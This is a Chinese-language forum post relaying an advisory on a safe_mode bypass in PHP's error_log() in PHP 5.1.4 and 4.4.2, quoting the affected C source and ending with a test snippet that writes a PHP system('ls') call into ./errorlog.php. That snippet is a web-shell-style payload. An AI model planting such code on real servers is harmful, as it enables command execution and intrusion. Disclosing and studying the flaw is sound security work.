- 论坛徽章:
- 0
|
最近出的一个安全漏洞
受影响系统:
PHP PHP 5.1.4
PHP PHP 4.4.2
PHP的error_log()函数中存在安全模式限制绕过漏洞:
PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERROR
S, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
- -2013-2050---
在选项3中:
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS,
NULL);
- -2038 line---
漏洞存在于php_stream_open_wrapper()。如果用户提供了“prefix://../../”的话,IGNORE_URL就会关闭safe_mode。
测试:
<?php
if (!isset($username)) {
error_log("<?system('ls');?>",3 ,"./errorlog.php");
}
?> |
|